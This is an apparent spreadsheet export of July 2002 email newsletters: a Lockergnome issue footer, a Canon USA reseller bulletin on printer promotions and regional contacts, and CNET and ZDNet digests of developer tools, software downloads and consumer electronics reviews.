\n\n![purple flower by\ntatosh]([URL]http://www.wincustomize.com[/URL]\n\n[Download]  \-- [Zoom]  \-- [Visit WinCustomize]\n\n  \n\n  \n\n|  [URL]http://www.lockergnome.com[/URL]  \n\nYour subscribed e-mail address is: [qqqqqqqqqq-lg@example.com] - To\nunsubscribe or change your delivery address, please visit the subscription\nmanagement page. For further information, please refer to the GnomeCREDITS in\nthe sidebar.  \n---  \n  \n|\n\nLOCKERGNOME  \n  \n---  \n  \n Geekathon 2002\n\n Latest Windows Daily  \n Latest Digital Media  \n Latest Tech Specialist  \n Latest Penguin Shell  \n Latest Apple Core  \n Latest Web Weekly  \n Latest Bits &amp; Bytes  \n Latest Audio Show  \n\n The GnomeSHOPPER\n\n Microsoft Office Tips  \n PC Productivity Tips  \n Cool Internet Tips  \n Windows 2000 Tips  \n Windows XP Tips  \n Top 50 Fun Sites  \n Must-Know Tech Terms  \n Top 50 Useful Sites  \n Top 75 Tech Sites  \n Top 50 PenguinCORE  \n Top 50 PenguinTWEAKS  \n\n Recommend Us!  \n Advertise With Us  \n High-Tech Job Search  \n Chat With Gnomies  \n Watch The Webcams  \n Computer Power User  \n\n Submit Your Opinion  \n Read Past Issues  \n Download X-Setup  \n About Lockergnome  \n Our Privacy Policy  \n View More Options  \n Get Chris's Book  \n\n General Feedback  \n E-mail the Editor  \n Jake's Blog  \n\n Our XML / RSS Feed  \n Syndicate Our Tips  \n Link To Lockergnome  \n\n![Syndicate Today's Content]([URL]http://www.lockergnome.com[/URL]\n\n  \n![Lockergnome Webcam\nImage]([URL]http://www.lockergnome.com[/URL]  \n---  \nCLICK HERE TO ZOOM  \n  \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GNOMEMUSIC  \n  \n---  \n  \n![Net Music Countdown]([URL]http://images.lockergnome.com[/URL]  \n---  \n  \n  \n**Coldplay Takes a Bigger Bite**  \nIf you miss Coldplay's quick little club tour this August, don't worry, youll\nget a second chance to see them in...  \n  \n**Dave Matthews Gives Us 'Busted Stuff'**  \nThe Dave Matthews Band is breaking things up with their new album Busted\nStuff; it hit stores shelves yesterday. The...  \n  \n**Strokes Leave Weezer Hanging**  \nStrokes fans who are heading to the Weezer tour to catch the Strokes opening\nwill be disappointed. The Strokes were...  \n  \n**Jaz-O Sez Jay-Z is a Fraud**  \nThe rap between rappers Jaz-O and Jay-Z is nothin but diss...otherwise known\nas a falling out. Jaz-O was Jay-Z's...  \n  \n**Booze, Drugs in Aaliyah's Pilot**  \nThe pilot who was at the controls of a small plane that crashed and killed\nsinger and actress Aaliyah had cocaine...  \n  \n**McGraw's Uncle Charged With Murder**  \nCountry singer Tim McGraw's uncle has been charged with shooting and killing a\nneighbor in Vallejo, California. One...\n\n\n\nGNOMECREDITS  \n  \n---  \n  \n(C)2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read\nour Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered\nat DNS Central.\n\n\n\n Search Past Issues:  \n![]([URL]http://images.lockergnome.com[/URL]\n\n|  \n  \n---  \n  \n\n\n![]([URL]http://www.lockergnome.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://images.lockergnome.com http://www.lockergnome.com http://support.microsoft.com http://www.glitschka.com http://www.deskmod.com http://www.fightcloud.com http://www.lockergnome.com http://www.bbesound.com http://images.lockergnome.com http://images.lockergnome.com http://images.lockergnome.com http://images.lockergnome.com http://images.lockergnome.com http://images.lockergnome.com http://www.wincustomize.com http://www.lockergnome.com http://www.lockergnome.com http://www.lockergnome.com http://images.lockergnome.com http://images.lockergnome.com http://www.lockergnome.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: CNET Delivers &lt;Online#3.20341.24-QI_LgZARqA78CdRR.1@newsletter.online.com&gt;\nDate: Wed, 17 Jul 2002 21:25:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 21:25:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Delivers &lt;Online#3.20341.24-QI_LgZARqA78CdRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>qqqqqqqqqq-zdnet@example.com</t>
  </si>
  <si>
    <t>Canon USA Reseller News : July</t>
  </si>
  <si>
    <t>![CNET Announce]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![](/b.gif)  \n\n![]([URL]http://home.cnet.com[/URL]\n\n| ![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |    July 18, 2002  \n| ![Canon USA Reseller\nNews]([URL]http://www.captureleads.com[/URL]  \n---  \n_July 2002 / Volume 2 No. 5_  \n  \n  |  \n**  \nThe Canon USA Reseller News  **provides resellers with monthly announcements\non Canon products that are purchased through national distributors.  \n  \n  \n  \n  \n|   |   |  \nScan the following topics for **"News You Can Use."**\n\n  * They're Here!  \n\n  * Check Out Our Q3 Promotions  \n\n  * Guess What's Coming to Distribution  \n\n  * Web-based Training Addition / We Have a Winner  \n\n  * Reseller Account Executive  \n\n|  \n---|---|---|---|---|---  \n  \n  | **They're Here!** |  \n---|---|---  \n  | Canon's N1000 and N2000 innovative Office Color Printers are here! Orders\nare now being taken for these ... Super High Speed ... Super High Quality ...\nLarge Volume printers! With super low operating costs and excellent\ndurability, these printers provide the solution to your customers' business\ncolor needs.  \n  \nProviding our resellers with the tools necessary to be successful in the\nmarketplace is important to us. In an effort to help you jump-start your N1000\nprinter sales, we are making available, on a first come first served basis,\nHALF-PRICE N1000 DEMO units. For your convenience, these units can be\npurchased at Ingram Micro, Tech Data or D&amp;H.; There is a limit of one half-\nprice unit per reseller - and supplies are limited - so order today!  \n  \nTo help you generate interest with your customers for the N1000/N2000, we have\ncreated a video banner ad that can be run on your website. Log on to our\nreseller website: [URL]http://www.canonresellers.com[/URL] to view the N1000/N2000 video\nbanner ad. You'll find the ad running on the Home Page. To order a CD of this\nvideo banner ad for your use, contact your Canon Account Executive.  |  \n  \n  | **Check Out Our Q3 Promotions** |  \n---|---|---  \n  \n\n**Product**\n\n| **Instant Rebate*** | **Timeframe**  \n---|---|---  \nimageCLASS 1100 | $100 | Through September 30, 2002  \n  \n  | *All rebates will be reflected on the distributor invoice price **_at the\ntime of purchase_**.  \n  \n**Quarterly Performance/Growth Bonus**  \n  \nIt's a new quarter and a fresh opportunity to become a Canon Premier Partner.\nOur quarterly growth goals are within reach! Your purchases of all eligible\nhardware* between July 1, 2002 and September 30, 2002 work toward your Premier\nPartner status. Following are the rebate categories:  \n  \n$50,000-$99,000 = 4% rebate  \n$100,000+ = 6% rebate  \n  \nClaim forms for submitting your claims are available from your Canon reseller\nAccount Executive and at [URL]www.canonresellers.com[/URL]  \n  \n*Only hardware is eligible - DR-3060, DR-3080C, DR-5020, DR-5080C, DR-4580U, DR-4080U, N1000/N2000 Office Color Printers, imageCLASS 2200 and imageCLASS 1100. CarePAKS, consumables, maintenance kits and media are not eligible.  \n  \nClick on [URL]www.canonresellers.com[/URL], to find your tools for success!  \n|  \n---|---|---  \n  \n  \n  | **Guess What's Coming to Distribution** |  \n---|---|---  \n  |  Here's a clue: Canon is known 'far and wide' for its products. Coming\nsoonÂ—at a distributor near you - we'll show you just how 'wide' our products\ncan be. Watch for another clue in our August newsletter! |  \n  \n  | **Web Based Training Addition / We Have a Winner** |  \n---|---|---  \n  | As promised, we're about to launch another web training course. Final\ntouches are being made on Canon's **N1000/N2000** web training course. This\ncreative and informative course - covering topics that include Features,\nInstallation, Connectivity and Markets - is not to be missed. Details to\nfollow.  \n  \nWe have a winner! Congratulations to everyone who completed the imageCLASS\n1100 web training before June 30! The winning name was randomly selected from\na 'hat' and we're pleased to announce the winner of the Canon PowerShot A20\ndigital camera works at one of our valued resellers in North Carolina! |\n![]([URL]http://www.captureleads.com[/URL] |  \n  | Although the contest is over... the learning should not stop. If you have\nnot yet completed this informative imageCLASS 1100 training course, log on to\n[URL]http://www.canonresellers.com[/URL] right click on Simon and go to the training\nsite.  \n  \n|  \n  \n  | **Reseller Account ExecutiveÂ—Contact Changes** |  \n---|---|---  \n  | Canon has a dedicated team of Account Executives whose mission is to work\nwith you to achieve our mutual business goals.  \n  \nCheck the list below and note the name and e-mail address of the Account\nExecutive assigned to your state. Be sure to contact your Account Executive\nfor support with the following:  |  \n  |\n\n  * N1000/N2000 Video Banner Ad  \n\n  * Events (Open Houses/Shows)  \n\n  * Sales Support Collateral  \n\n  * Discounted Demo Units  \n\n|\n\n  * End User Sales Calls  \n\n  * Demand Generation  \n\n  * Product Training  \n\n  * Bids  \n\n|  \n  | Account Executives are listed below with the states that they cover.  \n|  \n  \n  | **Northeast** | **John Brogan** | **(jbrogan@cusa.canon.com)** |  \n---|---|---|---|---  \n  | Connecticut | Maine  | New Hampshire | Rhode Island |  \n  | Massachusetts | New York | New Jersey | Vermont |  \n  |  |  |  |  |  \n  | **Mid Atlantic** | **Greg Harzenski** | **(gharzenski@cusa.canon.com)** |  \n  | Delaware | Maryland | Washington D.C. |   |  \n  |  |  |  |  |  \n  | **Midwest** | **Jennifer Mickeletto** | **(zzzickeletto@cusa.canon.com)**\n|  \n  | Indiana | Kansas | Missouri | Ohio |  \n  | Colorado | Kentucky | Nebraska | Tennessee |  \n  |  |  |  |  |  \n  | **Mid North** | **Chad Crump** | **(ccrump@cusa.canon.com)** |  \n  | Alaska | Illinois | Minnesota | Washington |  \n  | Idaho | Montana | North Dakota | Wisconsin |  \n  | Iowa | Michigan | South Dakota | Wyoming |  \n  |  |  |  |   |  \n  | **South** | **Randal Kendrix** | **(rkendrix@cusa.canon.com)** |  \n  | Arkansas | Mississippi | Oklahoma | Utah |  \n  | Louisiana | New Mexico | Texas |   |  \n  |  |  |  |  |  \n  | **Southeast** | **Carmen DiMartino** | **(cdimartino@cusa.canon.com) ** |  \n  | Alabama | North Carolina | Puerto Rico | West Virginia |  \n  | Florida | South Carolina | Virginia |   |  \n  | Georgia | Pennsylvania | Virgin Islands |  |  \n  |  |  |  |  |  \n  | **Southwest** | **Heath Tagtmeyer** | **(htagtmeyer@cusa.canon.com)** |  \n  | Arizona | Hawaii | Oregon |  |  \n  | California | Nevada |  |  |  \n  |  |  |  |  |  \n  | _If you wish to opt out of receiving future e-mail blasts, pleaseclick\nhere. If you would like additional recipients to receive our monthly\ncommunications, send additional names and e-mail addresses to\ncanonresellers@cits.canon.com. _ |  \n  |   |   |   |   |  \n  \n![]([URL]http://www.cnet.com[/URL]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zdnet@example.com\n\nUnsubscribe | Manage My Subscriptions  | FAQ  | Advertise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  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.captureleads.com http://www.canonresellers.com www.canonresellers.com www.canonresellers.com http://www.captureleads.com http://www.canonresellers.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zdnet@example.com\nFrom: "ZDNet Buyer's Alert" &lt;Online#3.20339.ef-JR6Xl18mvFh519RR.1@newsletter.online.com&gt;\nDate: Wed, 17 Jul 2002 20:58:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 20:58:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>"ZDNet Buyer's Alert" &lt;Online#3.20339.ef-JR6Xl18mvFh519RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Sneak Peek: NEW HP Products</t>
  </si>
  <si>
    <t>\n\n![ZDNet\nAnnounce]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | *** * * * * * * * SPECIAL ADVERTISER\nANNOUNCEMENT * * * * * * * *** | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---|---|---|---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |    July 18, 2002  \n|  |\n![]([URL]http://hpshopping.speedera.net[/URL]\n|\n![]([URL]http://hpshopping.speedera.net[/URL]  \n---|---  \n![]([URL]http://hpshopping.speedera.net[/URL]  \n![]([URL]http://hpshopping.speedera.net[/URL]  \n![]([URL]http://hpshopping.speedera.net[/URL]  \n![]([URL]http://hpshopping.speedera.net[/URL]  \n![]([URL]http://hpshopping.speedera.net[/URL]  \n![]([URL]http://hpshopping.speedera.net[/URL]  \n![]([URL]http://hpshopping.speedera.net[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([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areers | ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://hpshopping.speedera.net http://hpshopping.speedera.net http://hpshopping.speedera.net http://hpshopping.speedera.net http://hpshopping.speedera.net http://hpshopping.speedera.net http://hpshopping.speedera.net http://hpshopping.speedera.net http://hpshopping.speedera.net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clickthru.online.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: CNET CatchUp &lt;Online#3.20359.74-k8cCgc95N6xNP9RR.1@newsletter.online.com&gt;\nDate: Wed, 17 Jul 2002 18:14:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 18:14:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET CatchUp &lt;Online#3.20359.74-k8cCgc95N6xNP9RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>CNET: A note to our subscribers</t>
  </si>
  <si>
    <t>CNET | CatchUp Dispatch\nCNET: A note to our subscribers\nJuly 17, 2002\nVol. 3, No. 17\n\nDear CatchUp newsletter subscribers:\n\nStarting this week, we will be taking a break from our\nregularly scheduled CatchUp newsletter--our apologies for any\ninconvenience this may cause. However, have no fear, the\nCatchUp database is still being updated, so run CatchUp now and\nsee what updates are waiting for you. As always, a hearty\nthank-you for your continued support.\n\nCheers!\n\nThe CatchUp Team\n\n_________________________________________________________________\n\nThe e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com\n\nTo sign up for more CNET newsletters, click here:\n[URL]http://nl.com.com[/URL]\n\nTo unsubscribe, click here:\n[URL]http://clickthru.online.com[/URL]\n\nFor the CNET Newsletters FAQ, click here:\n[URL]http://clickthru.online.com[/URL] \n\nTo learn about advertising opportunities in CNET Newsletters, click\nhere:\n[URL]http://clickthru.online.com[/URL] \n\n\nCopyright 2002 CNET Networks, Inc. All rights reserved.</t>
  </si>
  <si>
    <t>http://nl.com.com http://clickthru.online.com http://clickthru.online.com http://clickthru.online.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: "CNET: Tools for Software Developers" &lt;Online#3.20351.c6-p402lCSzguclhRRR.1@newsletter.online.com&gt;\nDate: Wed, 17 Jul 2002 17:22:48 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 17:22:48 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET: Tools for Software Developers" &lt;Online#3.20351.c6-p402lCSzguclhRRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>This Week: Chilkat Zip, Anfy Java, VB-PowerWrap</t>
  </si>
  <si>
    <t>![Download Dispatch - Tools\n\nfor Software\nDevelopers]([URL]http://download.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n![]([URL]http://a.r.tv.com[/URL]  \n**Stamp out the bugs  \n** Does your code need a once-over? Debug your software with this collection\nof tools and utilities designed to locate and correct programming mistakes,\ntrack defects, and more.  \n\n![Software Updates]([URL]http://www.cnet.com[/URL]  \n|  **XML Spy Suite 4.4**  \nOpen and edit XML, XSL, 3DML, or DTD documents.\n\n**JadeIDE for Java 3.0**  \nUse this GUI to edit your source code more easily.\n\n**UniquE RAR File Library 0.4.0**  \nEnable your applications to create and decompress RAR archives.\n\n**SkICMP ActiveX Control 2.2**  \nDiagnose, troubleshoot, and monitor your network.\n\n![Software\n\nUpgrades]([URL]http://a.r.tv.com[/URL]  \n| **Software Upgrades:**  \n  \n---  \n**  1.** |  ZoneAlarm Pro 3.0  \n**  2.** |  Norton AntiVirus 2002  \n**  3.** |  AdSubtract Pro 2.5  \n**  4.** |  Microsoft Windows XP - Professional  \n**  5.** |  Nero Burning ROM 5.5  \n**  6.** |  Reason 2.0  \n**  7.** |  Microsoft Windows XP - Home Edition  \n**  8.** |  QuickBooks Pro 2002  \n**  9.** |  Adobe Photoshop 7.0  \n**10.** |  WinZip 8.1  \n  \nFind a complete list of the 50 most popular software products at **CNET\nShopper.com**.  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  | ![]([URL]http://www.cnet.com[/URL] |  July 17,\n2002\n\n**Greetings from Download.com!**\n\nNo software developer is immune to bugs. Even the cleanest code will have to\ngo through a debugging process, but some debuggers are more efficient than\nothers. Check out Download.com's complete collection of debugging tools here,\nand put away the can of Raid.\n\nAlso this week, we've got some very handy utilities. First, there's Chilkat, a\ncool zip/unzip ActiveX control that you can add to any language with ActiveX\nsupport (which is most major ones). But my personal favorite is VB-PowerWrap,\na simple tool that takes all the far-flung bits and pieces of your Visual\nBasic masterpiece and socks them all away into one executable file for ease of\ndistribution.\n\nBecky Waring  \nContributing Editor, CNET Download.com\n\n| ![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n---  \n![Reviews &amp; Features]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \nFrom Builder.com  \n**Achieving persistence with Entity Beans**  \nEnterprise JavaBeans (EJB) allow for greater code reuse and flexibility. See\nhow Entity Beans enable you to leverage EJB functionality in your apps.  \n  \n![]([URL]http://home.cnet.com[/URL]  \n**Counting lines of code can help measure progress**  \nOne developer has come around to thinking that counting lines of code can\nyield useful information. He explains why and shares a sample app that\nautomates the process.\n\n![Picks of the week]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \nin ActiveX  \n**Chilkat Zip 6.0.2**  \nNeed to add zip capability to your apps? Create and decompress zip archives\nwith the Chilkat Zip ActiveX control. The control provides easy access to\nindividual files stored within a zip archive. You can search for a file within\nthe zip using a wildcard string and then extract individual files or files\nmatching a pattern. Files can be unzipped to any directory, and the control's\nmemory management allows any size file to be compressed or decompressed in a\nconstant memory footprint. The control allows you to compress directly from\nmemory buffers or strings, as well as add multiple files with wildcarding.\nThere's even a real-time progress monitor for zip and unzip operations.\nChilkat supports Active Server Pages, Visual Basic, Visual C++, Delphi, C++\nBuilder, and all languages that use ActiveX controls.\n\nin Java  \n**Anfy Java 2.0**  \nAnfy is a collection of 52 applets for Web pages, desktop wallpapers, or\nscreensavers. Within the program's simple interface, you can quickly apply\nreal-time graphic effects to GIF and JPEG images. Effects include 3D texture-\nmapped cube menus, lake effects, water and fire, deformations, zoom rotators,\nlens magnification, waving flags, animations, scrolling text, customizable IFS\nfractals, color changers, light shading, tunnels, and wormholes.\n\nin Tools &amp; Editors  \n**VB-PowerWrap 3.1**  \nDistribute Visual Basic applications the easy way with VB-PowerWrap. VB-\nPowerWrap embeds all dependent and non-dependent files into the executable of\nyour VB program, including DLLs and OCXs, graphics, databases, and text files,\nto create a single clickable application. VB-PowerWrap scans a VB project,\nwraps the appropriate files, and creates a self-contained file for\ndistribution. In addition, VB-PowerWrap compresses all DLLs and OCXs and\nregisters appropriate controls on the user's machine if needed. It works with\nVisual Basic 4, 5, and 6.\n\n![This Week's Top Ten Downloads]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n|   | **Most Popular Titles**  \nWeek ending July 14  |    **Last  \n  Week**  |    **Weeks  \n  on Chart**  |    **Downloads  \n  This Week**  \n---|---|---|---|---  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n1. | **Microsoft Windows Installer (95/98/Me) ** |  2|  84|  9,082  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n2. | **Microsoft Data Access Components RTM** |  3 |  84 |  8,901  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n3. | **Java 2 Runtime Environment, SE ** |  4 |  84 |  8,197  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n4. | **Visual Basic 6.0 Runtime Module SP5 **|  5 |  73 |  7,960  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n5. | **Mozilla (32-bit) ** |  7|  5|  6,683  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n6. | **ActiveX Control Pad ** |  6 |  7 |  4,030  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n7. | **UltraEdit-32** |  11 |  84 |  2,995  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n8. | **Borland C++ Compiler** |  9 |  60 |  2,492  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n9. | **Java 2 Development Kit** |  10 |  84 |  2,177  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n10. | **TextPad (32-bit) **|  12 |  84 |  2,056  \n| ![]([URL]http://www.cnet.com[/URL]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zdnet@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16&amp;ISSUE=2002-07-17)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://download.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://a.r.tv.com http://www.cnet.com http://a.r.tv.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.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cnet-newsletters@example.com\nFrom: CNET Cool Gear &lt;Online#3.20349.a1-TUc1lp9zMobLddRR.1@newsletter.online.com&gt;\nDate: Wed, 17 Jul 2002 17:15:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 17:15:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Cool Gear &lt;Online#3.20349.a1-TUc1lp9zMobLddRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>qqqqqqqqqq-cnet-newsletters@example.com</t>
  </si>
  <si>
    <t>CNET Cool Gear: Find the right cordless phone</t>
  </si>
  <si>
    <t>![CNET Cool Gear Newsletter]([URL]http://a.r.tv.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://a.r.tv.com[/URL]  \n\n![]([URL]http://i.i.com.com[/URL]\n![]([URL]http://www.techrepublic.com[/URL]\n\n  \n|  ![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nElectronics All CNET The Web  \n---  \n  \n![Editors' Choice]([URL]http://a.r.tv.com[/URL]  \nToshiba Pocket PC e310 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Handhelds  \n---  \nOnkyo TX-DS797 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Electronics  \nCanon PowerShot G2 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Cameras  \nPioneer HTS-910DV ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Electronics  \nCreative Labs Nomad Jukebox 3 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Portable Electronics  \nMicrosoft Xbox ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Electronics  \nPanasonic DVD-RP91 DVD player ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Electronics  \n  \n![]([URL]http://a.r.tv.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] July 17, 2002  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://a.r.tv.com[/URL]  \n\--Colin Duwe  \nAssociate Editor  \nCNET Electronics  \n|  |  **Dear readers,**  \nEverybody seems to have a cordless phone at home. But how do you know which\nmodels offer the best value? Well now you can turn to CNET. Last week, we\nlaunched our reviews of cordless phones. So when the time comes to replace\nyour phone, pay a visit to CNET for some unbiased advice on what to buy.  \n**Read the full story **  \n  \n  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n![Reviews and Features]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://electronics.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n---|---  \n**Cordless phones:  \nThe other wireless devices**  \nAre you in the market for a new cordless phone but don't know whether to buy a\n900MHz or a 2.4GHz model or what manufacturer offers the best product? No\nsweat--check out our new line coverage to find the phone that fits your\npersonal style and needs.  \n**Read the full story**  \n  \n**Sony DCR-VX2000: MiniDV maestro**  ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nSony"s DCR-VX2000 gives prosumers a versatile tool for capturing high-quality\ndigital video. With three CCDs, smooth performance, and excellent low-light\ncapability, this camcorder meets the demands of avid videographers where\nlesser cameras fail.  \n**Read the review |  Check prices**  \n  \n**Image is everything: JVC"s HDTV VCR**  \nThe world"s first D-Theater video deck has hit the market. It isn"t cheap, but\nit sure delivers an awesome picture, with more than twice the resolution of\nDVD. Read the full review.  \n**Read the review  |  Check prices**  \n  \n**Harman Kardon AVR 125: All you need?**  \nThis may be the least expensive of HK's home-theater receivers, but we gave it\nhigh marks for sound quality, handy features, and ease of use. Is it all the\nreceiver that you need?  \n**Read the review  |  Check prices **  \n  \n**Sony CLIE PEG-T665C:  \nPerhaps the last Palm OS 4 PDA**  \nWith a fast processor, a great color screen, and MP3 support, this handheld\nlooks appealing. But with comparably priced Pocket PCs available and a new\nwave of Palm-powered devices waiting in the wings, the T665C is a tough call.\nWe give you our advice.  \n**Read the full column  |  Check prices **  \n  \n**Hitachi DVP725U: Classy progressive-scan player**  \nWith sleek looks, excellent picture quality, and a sub-$200 price tag, the\nDVP725U fares well against the rest of the budget-progressive-scan DVD player\ncompetition. Find out why our reviewer thinks it"s a good bargain.  \n**Read the full column  |  Check prices **  \n  \n  \n\n![]([URL]http://home.cnet.com[/URL]\n![]([URL]http://home.cnet.com[/URL] **\n\n  * Live tech help. Submit your question now.\n  * CNET News.com: Top CIOs on the future of IT.\n  * Find a job you love. More than 1 million postings\n  * ZDNet: This IT director has had enough of Microsoft\n  * May Editors' Choice award: Pioneer's Home Theater System HTS-910DV\n\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12&amp;ISSUE=2002-07-17)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
